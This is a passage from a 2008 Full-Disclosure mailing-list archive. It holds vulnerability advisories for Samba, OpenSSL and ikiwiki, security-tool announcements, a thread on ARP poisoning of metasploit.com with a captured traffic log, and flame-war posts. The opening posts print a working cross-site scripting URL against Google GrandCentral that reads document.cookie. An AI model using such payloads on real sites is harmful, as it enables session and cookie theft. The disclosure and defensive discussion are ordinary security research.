From kristian.hermansen at gmail.com Sun Jun 1 20:54:02 2008 From: kristian.hermansen at gmail.com (Kristian Erik Hermansen) Date: Sun, 1 Jun 2008 12:54:02 -0700 Subject: [Full-disclosure] Google GrandCentral XSS 0day Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Enjoy... http://www.grandcentral.com/contacts/search_last_name?search_last_name=%22+onmouseover%3D%22alert(document.cookie)%22+onload%3D&srchinbxtype=&srchcncttype=&search_keywords= - -- Kristian Erik Hermansen - -- "When you share your joys you double them; when you share your sorrows you halve them." -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFIQv5xS292tflSrWIRAijQAKCYSJbYX6QtvcwP2Ycr8s5pe/iYCwCgsUbe ivCDR6KOABF6Q/T91teWU1M= =srPE -----END PGP SIGNATURE----- From kristian.hermansen at gmail.com Sun Jun 1 21:00:25 2008 From: kristian.hermansen at gmail.com (Kristian Erik Hermansen) Date: Sun, 1 Jun 2008 13:00:25 -0700 Subject: [Full-disclosure] Google GrandCentral XSS 0day Message-ID: Enjoy... http://www.grandcentral.com/contacts/search_last_name?search_last_name=%22+onmouseover%3D%22alert(document.cookie)%22+onload%3D&srchinbxtype=&srchcncttype=&search_keywords= -- Kristian Erik Hermansen -- "When you share your joys you double them; when you share your sorrows you halve them." From spikey.it at gmail.com Mon Jun 2 00:32:31 2008 From: spikey.it at gmail.com (Andrea Di Pasquale) Date: Mon, 2 Jun 2008 01:32:31 +0200 Subject: [Full-disclosure] ARP handler Inspection tool released Message-ID: <09715929-423D-49D1-AC1B-0AF763C38289@gmail.com> ArpON (Arp handler inspectiON) is a portable Arp handler. It Detects and Blocks all ARP Poisoning/Spoofing attacks with Static Arp Inspection (SARPI) and Dynamic Arp Inspection (DARPI) approach on switched/hubbed LAN with/without DHCP protocol. Important to note, it doesn't compromise the ARP protocol performances. I need testing and code revision, thank you. The link to project's documentation is: http://arpon.sourceforge.net/about.html The link to the project is: http://arpon.sourceforge.net From ghsec2010 at yahoo.com Mon Jun 2 17:04:49 2008 From: ghsec2010 at yahoo.com (Greyhat Security) Date: Mon, 2 Jun 2008 09:04:49 -0700 (PDT) Subject: [Full-disclosure] n3td3v.com Message-ID: <912376.11031.qm@web46103.mail.sp1.yahoo.com> n3td3v Troll, ? What's $80 to a high-caliber security researcher like yourself? ? I bet it gets a lot of hits and has the potential to be at the top of the 60,000 google results for n3td3v. ? How about n3td3vtrolling.com? ? What about n3td3v.net -- is that your site? ? All the best, ? ghsec ? -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists..grok.org.uk] On Behalf Of n3td3v Sent: Friday, May 30, 2008 6:36 PM To: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] n3td3v..com ? On Fri, May 30, 2008 at 7:29 AM, Sec Guy wrote: > I just saw n3td3v.com up for sale on sedo... > ? > https://sedo.com/search/details.php4?domain=n3td3v.com&tracked=&partnerid=&language=us > ? > -SecGuy > ? ? No one is going to pay $80 for it, you may as well give it to me for free ;) ? All the best, ? n3td3v ? http://n3td3v.googlepages.com ? _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080602/c81925e1/attachment.html From kristian.hermansen at gmail.com Mon Jun 2 17:49:58 2008 From: kristian.hermansen at gmail.com (Kristian Erik Hermansen) Date: Mon, 2 Jun 2008 09:49:58 -0700 Subject: [Full-disclosure] Google GrandCentral XSS 0day In-Reply-To: References: Message-ID: On Sun, Jun 1, 2008 at 1:00 PM, Kristian Erik Hermansen wrote: > Enjoy... > > http://www.grandcentral.com/contacts/search_last_name?search_last_name=%22+onmouseover%3D%22alert(document.cookie)%22+onload%3D&srchinbxtype=&srchcncttype=&search_keywords= Google has seemingly fixed this 0day in under 12 hours. Congrats to our boys at the GOOG... -- Kristian Erik Hermansen -- "When you share your joys you double them; when you share your sorrows you halve them." From announce-noreply at rpath.com Mon Jun 2 13:47:28 2008 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Mon, 02 Jun 2008 08:47:28 -0400 Subject: [Full-disclosure] rPSA-2008-0180-1 samba samba-client samba-server samba-swat Message-ID: <4843ebe0.Vp8NIOc8TEI3Clt9%announce-noreply@rpath.com> rPath Security Advisory: 2008-0180-1 Published: 2008-06-02 Products: rPath Appliance Platform Linux Service 1 rPath Linux 1 rPath Linux 2 Rating: Critical Exposure Level Classification: Remote Root Deterministic Unauthorized Access Updated Versions: samba=conary.rpath.com at rpl:1/3.0.30-0.1-1 samba=conary.rpath.com at rpl:2/3.0.30-1-0.1 samba-client=conary.rpath.com at rpl:1/3.0.30-0.1-1 samba-client=conary.rpath.com at rpl:2/3.0.30-1-0.1 samba-server=conary.rpath.com at rpl:1/3.0.30-0.1-1 samba-server=conary.rpath.com at rpl:2/3.0.30-1-0.1 samba-swat=conary.rpath.com at rpl:1/3.0.30-0.1-1 samba-swat=conary.rpath.com at rpl:2/3.0.30-1-0.1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-2582 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1105 Description: Previous versions of the samba package are vulnerable to an Arbitrary Code Execution attack in which a remote attacker may cause a heap-based buffer overflow via a maliciously crafted SMB response. http://wiki.rpath.com/Advisories:rPSA-2008-0180 Copyright 2008 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html From announce-noreply at rpath.com Mon Jun 2 18:09:55 2008 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Mon, 02 Jun 2008 13:09:55 -0400 Subject: [Full-disclosure] rPSA-2008-0181-1 openssl openssl-scripts Message-ID: <48442963.NjDMHjKsV2yqBnZU%announce-noreply@rpath.com> rPath Security Advisory: 2008-0181-1 Published: 2008-06-02 Products: rPath Linux 2 Rating: Minor Exposure Level Classification: Indirect User Deterministic Denial of Service Updated Versions: openssl=conary.rpath.com at rpl:2/0.9.8g-6-0.1 openssl-scripts=conary.rpath.com at rpl:2/0.9.8g-6-0.1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-2569 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1672 Description: Previous versions of the openssl package are vulnerable to a Denial of Service attack in which a malicious server may crash clients that connect using particular cipher suites. http://wiki.rpath.com/Advisories:rPSA-2008-0181 Copyright 2008 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html From thijs at debian.org Sun Jun 1 19:03:54 2008 From: thijs at debian.org (Thijs Kinkhorst) Date: Sun, 1 Jun 2008 20:03:54 +0200 (CEST) Subject: [Full-disclosure] [SECURITY] [DSA 1553-2] New ikiwiki packages fix regression Message-ID: <20080601180354.104553269A2@morgana.loeki.tv> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1553-2 security at debian.org http://www.debian.org/security/ Thijs Kinkhorst June 01, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : ikiwiki Vulnerability : cross-site request forgery Problem type : remote Debian-specific: no CVE Id(s) : CVE-2008-0165 Debian Bug : 475445 The update of ikiwiki in DSA-1553-1 caused two regressions. An updated version of ikiwiki is available that fixes these problems. For reference, the full advisory text is below. It has been discovered that ikiwiki, a Wiki implementation, does not guard password and content changes against cross-site request forgery (CSRF) attacks. For the stable distribution (etch), this problem has been fixed in version 1.33.6. For the unstable distribution (sid), this problem has been fixed in version 2.42. We recommend that you upgrade your ikiwiki package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/i/ikiwiki/ikiwiki_1.33.6.tar.gz Size/MD5 checksum: 227416 015972590255cf03068b9446c733254f http://security.debian.org/pool/updates/main/i/ikiwiki/ikiwiki_1.33.6.dsc Size/MD5 checksum: 1015 f833af1b001adf3ac2bea69dfe2aeead Architecture independent packages: http://security.debian.org/pool/updates/main/i/ikiwiki/ikiwiki_1.33.6_all.deb Size/MD5 checksum: 278396 f2f82d9f70008b403a952c12e02095b8 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iQEVAwUBSELjTmz0hbPcukPfAQJyLwgAqK4SgbHGlWxgjj7FM56FzujkmETdhgO0 4i8LQ1ct3n8u3dfnek+ZanHvylsq140gpS4W/jSDfEowFZ40mrgM6xUfRF71ZBT2 CwYgM+ozk1t0ROiNjG34bMqTETJu2UJsNuWA/NVGRidpmI4AG/nM4mW6X0d3WgX+ IWnSeaMN7TvXAP/ynPZ7oLRB9grRdTdN5fRDs1T2P6lTlnGU3wJ4fKCarmo8yaXN 3w0z2V3gvBl1n85nlb6qKwNgsW/dPUMksu2B3RZe+ssoQP2wzCyg+GDKbO7Wk1jI Bgq+nbGdPeJtdx6Lb+rDHxnJPZDUscL+3EltPSPj0m14vLe008GLlA== =wrcr -----END PGP SIGNATURE----- From nicolas at immunitysec.com Mon Jun 2 14:50:40 2008 From: nicolas at immunitysec.com (Nicolas Waisman) Date: Mon, 02 Jun 2008 10:50:40 -0300 Subject: [Full-disclosure] Immunity Debugger 1.6 is out! Message-ID: <4843FAB0.4010408@immunitysec.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Immunity, Inc. proudly presents: IMMUNITY DEBUGGER 1.6 This release we are introducing the most requested feature since the release of ID 1.0 in the form of automatic symbol downloading. In the script department we included two awesome new scripts: tredll and findloop. Yes, you read that correctly, we have implemented dominator trees for your coverage analysis pleasure and you are now able to detect loops inside functions. Immunity Debugger 1.6 delivers more stability and fixes a lot of known issues. For example the old AddKnowledge/PostAnalysis bug is gone and the land of hooking is all happiness. Check the Changelog below for more details. Download it now: http://debugger.immunityinc.com/ For the next release we are working on variables and structure, so stay tuned! The Immunity ID Team - -------------- 1.60 Build 0 New Features: - - Debugger o Added 'Use Symbol Server' option [http://forum.immunityinc.com/index.php?topic=162] o Improved Getallnames o Added timestamp to log events - - Immunity Debugger API o Added getAllSymbolsFromModule method o Added libcontrolflow.py Container for classes DominatorTree and ControlFlowAnalysis o Added Clear function to FastLogHook. - - PyCommands o Added findloop.py: Find natural loops given a function start. o Added treedll.py: Creates imported dll tree. - - Bug Fixes: o Fixed POST_ANALYSIS_HOOK "FATAL ERROR" o Fixed Arguments overflow (Thanks David Wetson for reporting this one!) o Local Symbol Path issue o Analysis second pass option now works o Getallsymbols now correctly creates the PyDict [Import/Export/Library issue] -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFIQ/qwnx8KWzmcRsERAollAJ9/tfHb//iY32OosyMU6dbQ20VHBgCZAXVx V1luXd+QiKgh6CrzohMFs1Y= =5465 -----END PGP SIGNATURE----- From jacques.erasmus at prevx.com Mon Jun 2 16:40:31 2008 From: jacques.erasmus at prevx.com (Jacques Erasmus) Date: Mon, 2 Jun 2008 16:40:31 +0100 Subject: [Full-disclosure] Metasploit - Hack ? Message-ID: <004501c8c4c6$feb08890$fc1199b0$@erasmus@prevx.com> Seems like the metasploit site has been hacked. http://forum.eviloctal.com/redirect.php?tid=33254 &goto=lastpost#lastpost The links such as http://www.metasploit.com/framework etc are rediring to the above site - is anyone else seeing this ? -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080602/c739b602/attachment.html From tbiehn at gmail.com Mon Jun 2 18:49:31 2008 From: tbiehn at gmail.com (T Biehn) Date: Mon, 2 Jun 2008 13:49:31 -0400 Subject: [Full-disclosure] n3td3v.com In-Reply-To: <912376.11031.qm@web46103.mail.sp1.yahoo.com> References: <912376.11031.qm@web46103.mail.sp1.yahoo.com> Message-ID: <2d6724810806021049q2f899b1cu740b19bd287dccde@mail.gmail.com> nice font. On Mon, Jun 2, 2008 at 12:04 PM, Greyhat Security wrote: > n3td3v Troll, > > > > What's $80 to a high-caliber security researcher like yourself? > > > > I bet it gets a lot of hits and has the potential to be at the top of the > 60,000 google results for n3td3v. > > > > How about n3td3vtrolling.com? > > > > What about n3td3v.net -- is that your site? > > > > All the best, > > > > ghsec > > > > -----Original Message----- > From: full-disclosure-bounces at lists.grok.org.uk > [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of n3td3v > Sent: Friday, May 30, 2008 6:36 PM > To: full-disclosure at lists.grok.org.uk > Subject: Re: [Full-disclosure] n3td3v.com > > > > On Fri, May 30, 2008 at 7:29 AM, Sec Guy wrote: > >> I just saw n3td3v.com up for sale on sedo... > >> > >> >> https://sedo.com/search/details.php4?domain=n3td3v.com&tracked=&partnerid=&language=us > >> > >> -SecGuy > >> > > > > No one is going to pay $80 for it, you may as well give it to me for free ;) > > > > All the best, > > > > n3td3v > > > > http://n3td3v.googlepages.com > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From fdlist at digitaloffense.net Mon Jun 2 18:57:31 2008 From: fdlist at digitaloffense.net (H D Moore) Date: Mon, 2 Jun 2008 12:57:31 -0500 Subject: [Full-disclosure] Metasploit - Hack ? In-Reply-To: <004501c8c4c6$feb08890$fc1199b0$@erasmus@prevx.com> References: <004501c8c4c6$feb08890$fc1199b0$@erasmus@prevx.com> Message-ID: <200806021257.31737.fdlist@digitaloffense.net> Looks like someone is doing ARP poisoning at the ISP level. The actual metasploit.com server(s) are untouched, but someone is still managing to MITM a large portion of the incoming traffic. To make things even more fun, its cooinciding with a DoS attack (syn floods) on most of the open services. If you are worried about the the Metasploit Framework source code being MITM'd during SVN checkouts, use the SSL version of the SVN tree: $ svn co https://metasploit.com/svn/framework3/trunk/ -HD On Monday 02 June 2008, Jacques Erasmus wrote: > Seems like the metasploit site has been hacked. From pschmehl_lists at tx.rr.com Mon Jun 2 19:04:28 2008 From: pschmehl_lists at tx.rr.com (Paul Schmehl) Date: Mon, 02 Jun 2008 13:04:28 -0500 Subject: [Full-disclosure] Metasploit - Hack ? In-Reply-To: <004501c8c4c6$feb08890$fc1199b0$@erasmus@prevx.com> References: <004501c8c4c6$feb08890$fc1199b0$@erasmus@prevx.com> Message-ID: --On Monday, June 02, 2008 16:40:31 +0100 Jacques Erasmus wrote: > > > Seems like the metasploit site has been hacked. > > > > http://forum.eviloctal.com/redirect.php?tid=33254&goto=lastpost#lastpost > > > > The links such as http://www.metasploit.com/framework etc are rediring to the > above site ? is anyone else seeing this ? > Nope. Site appears to be working as expected. -- Paul Schmehl As if it wasn't already obvious, my opinions are my own and not those of my employer. From fdlist at digitaloffense.net Mon Jun 2 19:06:11 2008 From: fdlist at digitaloffense.net (H D Moore) Date: Mon, 2 Jun 2008 13:06:11 -0500 Subject: [Full-disclosure] Metasploit - Hack ? In-Reply-To: <200806021257.31737.fdlist@digitaloffense.net> References: <004501c8c4c6$feb08890$fc1199b0$@erasmus@prevx.com> <200806021257.31737.fdlist@digitaloffense.net> Message-ID: <200806021306.11742.fdlist@digitaloffense.net> Problem solved. Someone is ARP poisoning the IP address of the router on which the www.metasploit.com server resides. I hardcoded an ARP entry for the real router and that seems to solve the MITM issue. It doesn't help the other 250 servers on that network, but thats an issue for the ISP to resolve. I included a traffic sample of the ARP poisoning below, if anyone is interested: 13:04:38.967562 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:05:dc:0c:84:00 13:04:39.768055 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a 13:04:40.397616 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:05:dc:0c:84:00 13:04:40.397686 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a 13:04:40.397751 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a 13:04:40.397819 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a 13:04:40.397886 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a 13:04:41.127384 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a 13:04:41.127446 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a 13:04:41.447854 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a 13:04:41.447914 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a 13:04:41.826560 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a 13:04:42.768019 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a 13:04:43.397341 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:05:dc:0c:84:00 13:04:43.397410 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a 13:04:43.397476 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a 13:04:43.397548 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a 13:04:44.182397 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a 13:04:44.182464 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a 13:04:44.447680 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a 13:04:44.447749 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a 13:04:44.826588 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a 13:04:45.768273 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:05:dc:0c:84:00 13:04:46.396933 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a 13:04:46.397001 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a 13:04:46.397066 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a 13:04:47.174445 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:05:dc:0c:84:00 13:04:47.174514 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a 13:04:47.448530 00:15:f2:4b:cd:3a > 00:15:f2:4b:d0:c9, ethertype ARP (0x0806), length 60: arp reply 216.75.15.1 is-at 00:15:f2:4b:cd:3a > On Monday 02 June 2008, Jacques Erasmus wrote: > > Seems like the metasploit site has been hacked. From ghsec2010 at yahoo.com Mon Jun 2 19:43:34 2008 From: ghsec2010 at yahoo.com (Greyhat Security) Date: Mon, 2 Jun 2008 11:43:34 -0700 (PDT) Subject: [Full-disclosure] n3td3v.com Message-ID: <299745.76314.qm@web46111.mail.sp1.yahoo.com> Better? I want to buy some girlscout cookies, are you still selling them? Tell your mom I said "what's up?" ghsec ----- Original Message ---- From: T Biehn To: Greyhat Security Cc: full-disclosure at lists.grok.org.uk Sent: Monday, June 2, 2008 1:49:31 PM Subject: Re: [Full-disclosure] n3td3v.com nice font. On Mon, Jun 2, 2008 at 12:04 PM, Greyhat Security wrote: > n3td3v Troll, > > > > What's $80 to a high-caliber security researcher like yourself? > > > > I bet it gets a lot of hits and has the potential to be at the top of the > 60,000 google results for n3td3v. > > > > How about n3td3vtrolling.com? > > > > What about n3td3v.net -- is that your site? > > > > All the best, > > > > ghsec > > > > -----Original Message----- > From: full-disclosure-bounces at lists.grok.org.uk > [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of n3td3v > Sent: Friday, May 30, 2008 6:36 PM > To: full-disclosure at lists.grok.org.uk > Subject: Re: [Full-disclosure] n3td3v.com > > > > On Fri, May 30, 2008 at 7:29 AM, Sec Guy wrote: > >> I just saw n3td3v.com up for sale on sedo... > >> > >> >> https://sedo.com/search/details.php4?domain=n3td3v.com&tracked=&partnerid=&language=us > >> > >> -SecGuy > >> > > > > No one is going to pay $80 for it, you may as well give it to me for free ;) > > > > All the best, > > > > n3td3v > > > > http://n3td3v.googlepages.com > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From xploitable at gmail.com Mon Jun 2 21:12:24 2008 From: xploitable at gmail.com (n3td3v) Date: Mon, 2 Jun 2008 21:12:24 +0100 Subject: [Full-disclosure] Fwd: Comments on: Phoenix Mars Lander site hacked In-Reply-To: <4b6ee9310806021235i1a314511vf110bbd582f526ee@mail.gmail.com> References: <4b6ee9310806021235i1a314511vf110bbd582f526ee@mail.gmail.com> Message-ID: <4b6ee9310806021312y58044239ifee07431c7597910@mail.gmail.com> I want to know the language of the attackers, the world is waiting. This is the biggest scandal in infosec that the language of the attackers hasn't been publically released. All the best, n3td3v ---------- Forwarded message ---------- From: n3td3v Date: Mon, Jun 2, 2008 at 8:35 PM Subject: Comments on: Phoenix Mars Lander site hacked To: n3td3v by n3td3v 02 June 2008 12:28 You guys leave yourself open to verbal attacks with your stupidity of not caring what language the attackers used. I think the key part of the story is what the language and country is of the attackers. Wait, it'll be the chinese, and china... since thats America's number one scape goat cyber enemy. The secret service told University of Arizona not to release the language of the attackers, until its been OK'd by bush etc that they can fabricate that china done it, to further the U.S's cyber political agenda. http://news.cnet.com/8601-10784_3-9957275.html?communityId=2066&targetCommunityId=2066&messageId=732926#732926 From Valdis.Kletnieks at vt.edu Mon Jun 2 22:01:07 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Mon, 02 Jun 2008 17:01:07 -0400 Subject: [Full-disclosure] Fwd: Comments on: Phoenix Mars Lander site hacked In-Reply-To: Your message of "Mon, 02 Jun 2008 21:12:24 BST." <4b6ee9310806021312y58044239ifee07431c7597910@mail.gmail.com> References: <4b6ee9310806021235i1a314511vf110bbd582f526ee@mail.gmail.com> <4b6ee9310806021312y58044239ifee07431c7597910@mail.gmail.com> Message-ID: <119405.1212440467@turing-police.cc.vt.edu> On Mon, 02 Jun 2008 21:12:24 BST, n3td3v said: > I want to know the language of the attackers, the world is waiting. > > This is the biggest scandal in infosec that the language of the attackers > hasn't been publically released. And what happens if it turns out the hackers wrote it in *English*? (so that the average non-multilingual American can read it, presumably) Or what if it's in Chinese or Arabic, but only to create a red herring because the hackers are unemployed gits from an unfashionable section of England? And it's hardly the *biggest* scandal in infosec - if you think it is, you haven't paid attention for the last few decades. There's been *lots* bigger scandals. Do you have any *hard* evidence that it's anything *other* than the usual "refusal to comment on an ongoing investigation"? -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080602/c6f7acb0/attachment.bin From xploitable at gmail.com Mon Jun 2 22:17:16 2008 From: xploitable at gmail.com (n3td3v) Date: Mon, 2 Jun 2008 22:17:16 +0100 Subject: [Full-disclosure] Fwd: Comments on: Phoenix Mars Lander site hacked In-Reply-To: <119405.1212440467@turing-police.cc.vt.edu> References: <4b6ee9310806021235i1a314511vf110bbd582f526ee@mail.gmail.com> <4b6ee9310806021312y58044239ifee07431c7597910@mail.gmail.com> <119405.1212440467@turing-police.cc.vt.edu> Message-ID: <4b6ee9310806021417yd071d9dhf9cdaa5fc567991a@mail.gmail.com> On Mon, Jun 2, 2008 at 10:01 PM, wrote: > Or what if it's in Chinese or Arabic, but only to create a red herring > because the hackers are unemployed gits from an unfashionable section > of England? Thank fuck I live in Scotland then. > And it's hardly the *biggest* scandal in infosec - if you think it is, you > haven't paid attention for the last few decades. There's been *lots* bigger > scandals. I was going to put the biggest scandal in infosec in June 2008 so far, but I thought i'd bait your reply. > > Do you have any *hard* evidence that it's anything *other* than the usual > "refusal to comment on an ongoing investigation"? > Once George W Bush has OK'd the publication of the investigation results we'll know it was either Russia or China. From lists at grospolina.org Tue Jun 3 00:26:52 2008 From: lists at grospolina.org (kat) Date: Tue, 3 Jun 2008 01:26:52 +0200 Subject: [Full-disclosure] Fwd: Comments on: Phoenix Mars Lander site hacked In-Reply-To: <4b6ee9310806021417yd071d9dhf9cdaa5fc567991a@mail.gmail.com> References: <4b6ee9310806021235i1a314511vf110bbd582f526ee@mail.gmail.com> <4b6ee9310806021312y58044239ifee07431c7597910@mail.gmail.com> <119405.1212440467@turing-police.cc.vt.edu> <4b6ee9310806021417yd071d9dhf9cdaa5fc567991a@mail.gmail.com> Message-ID: <376417779.20080603012652@smtp.xlhost.de> Brazil! From lists at infosecurity.ch Tue Jun 3 11:13:57 2008 From: lists at infosecurity.ch (Fabio Pietrosanti (naif)) Date: Tue, 03 Jun 2008 12:13:57 +0200 Subject: [Full-disclosure] Anyone had ever got in contact with Symbian and Nokia security? Message-ID: <48451965.2060607@infosecurity.ch> I was looking for security contacts at Symbian and Nokia but was not able to quickly identify to which report security issue related to their platform. Does anyone already established a relationship with their security vulnerability representative and have the right contacts? Bye, Fabio Pietrosanti (naif) From thomas.springer at serversniff.net Mon Jun 2 22:40:37 2008 From: thomas.springer at serversniff.net (Thomas Springer) Date: Mon, 2 Jun 2008 23:40:37 +0200 Subject: [Full-disclosure] Checkinterface for weak SSL and SSH-Keys Message-ID: For i still don't know any public check for weak SSL-Certs and SSH-Keys, i set up two checks for weak ssh- and ssl-keys, implementing the most common blacklists. http://serversniff.net/sslcert.php and http://serversniff.net/sshreport.php Maybe this is helping those not able to cope with the currently available shellscripts to check their infrastructure for the flaw. tom From dtangent at defcon.org Tue Jun 3 00:47:05 2008 From: dtangent at defcon.org (The Dark Tangent) Date: Mon, 2 Jun 2008 16:47:05 -0700 Subject: [Full-disclosure] DEFCON 16 Update - Get involved! Message-ID: <009c01c8c50a$f8f48b60$eadda220$@org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 DEFCON 16 Updates! As DEFCON 16 gets closer its awesome powers, much like a kraken summoned by Dethklok, continues to grow. How do you become friends with a kraken? You get to know it. Have a beer. Below are various way you can get involved with DEFCON 16 contests and events. The Call for Papers is closed, and selections are being announced all this week, so it is a bit too late to speak, but not too late to get involved. https://www.defcon.org/html/defcon-16/dc-16-speakers.html Artwork Contest: Artwork Contest is now underway! The first batch of submissions is up at: https://pics.defcon.org/showgallery.php?cat=532 Entries will be posted as they are received, and will be accepted through June 15th. There will then be a vote on pics.defcon.org for the viewer's choice award. You must to have a forums/pics account to vote, so go sign up! The Official rules, prizes, and entry information can be found at: http://www.defcon.org/html/defcon-16/dc-16-artwork-contest.html Black and White Ball: A Call 